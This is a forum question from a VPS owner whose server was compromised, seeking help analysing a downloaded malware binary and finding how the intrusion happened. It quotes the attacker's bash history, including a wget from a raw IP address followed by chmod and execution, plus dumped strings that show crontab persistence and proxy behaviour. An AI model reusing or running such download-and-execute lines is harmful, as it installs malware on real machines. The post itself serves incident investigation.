# Decompile a binary virus/worm

Tags: ubuntu, vps

We got hacked, someone got access on our VPS machine. There are no ssh logs, there are no auth logs. There is no actual trace of remote access (that I could find and I'm not a security expert but I'm not a complete beginner either).

After a lot of digging we found that the `root` user have some new lines in `/root/.bash_history`, specifically these:

```
cd /var/lib/
wget http://88.198.27.53:1085/pklib
chmod +x pklib
./pklib
```

The `pklib` file is a binary. Running `cat pklib` turns a lot of gibberish and a couple of lines that resemble a manual http request

```
��,q��,q��,q���n��,q��,q��&o��,q��q��,q��,q��,q��,q��#q��CONNECT %s:%d HTTP/1.0
Host: %s:%d

200 OK%s%s%.2d/%.2d/%d %.2d:%.2d:%.2d%d%s%s%d%s%llu%s%s/?rbwb%d%s%llu%s%s%s/%s/proc/%i/exe/proc/self/cmdline%.4d-%.2d-%.2d %.2d:%.2d:%.2d%d%dhttp://%s%s%sGET %s HTTP/1.1
Host: %s
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Connection: close

/proc//proc/statbtime /proc/%s/stat%s (%[^)]/proc/%s/exe/dev/ptmx
exit

exit

/bin/sh/bin/bash/..//.///localhostUSERUnknownr/etc/version/etc/%s/etc/lsb-release/etc/redhat-release/proc/cpuinfomodel name,PATHHOME%s%s%s%s%llu%llu%llu%d%s%s%s%s%s%s%d%d%s%d%s%d%s%dcrontab -l 2>&1w/tmp/nctf.txt@reboot "%s"no crontab for crontab /tmp/nctf.txt 2>&1-m.Settings/tmp/.%srb+%Rand%-m "%s"E�2��^3�!���{16:%s;0:%llu:%s;%c%ll @�6%d%s%s%s%.2d/%.2d/%d %.2d:%.2d:%.2d%s--socket:[[0000]:/proc/proc/%s/fdfd//proc/net/tcp%d: %64[0-9A-Fa-f]:%X %64[0-9A-Fa-f]:%X %X %X:%X %X:%X %X %d %d %d %512s
```

I tried run this script on a dummy machine (freshly created and empty) and the script just install itself on `/root/.Install/Host.out` and add a crontab entry to run this script on reboot

The machine where the binary was downloaded does not exist anymore, probably destroyed after our machine got infected. Since the script does http request (I think) I tried , without success, to run a sniffer to try and catch the requests content or at least the IPs it connects. It connects to a lot of machines and tcpdump can't find any useful thing (not http requests)

Now I have two questions:

1. How can I debug this binary file and find out what it does?
2. How the hacker got access on our machine?

My current goal is to find how the access happened, what the script does and how prevent such things from happening again

*Footnotes* if anyone is interested in the mystery:

- `ssd_config` blocks root login and password login
- `auth.log` have a lot of attempts of login, with several users and without a single success

  Users like: root, d3ftup, web, admin, game, unknown, book, etc
- There are no other users created

  The script did not create a new user and give access to it, running `sudo cat /etc/shadow | grep '^[^:]*:[^\*!]'` return 2 users, root and myuser. root does not have ssh access and myuser is a restricted user that we use to upload updates

P.S.: I'm not sure if the title does justice to what I want, but is the closest I could think

Comment: What else you run on this VPS? nginx, apache, php, Ruby, NodeJS?

Comment: @ThoriumBR only a bitcoin node, this machine does not have the private keys, only a watch-only wallet

Comment: No web server, no app, no database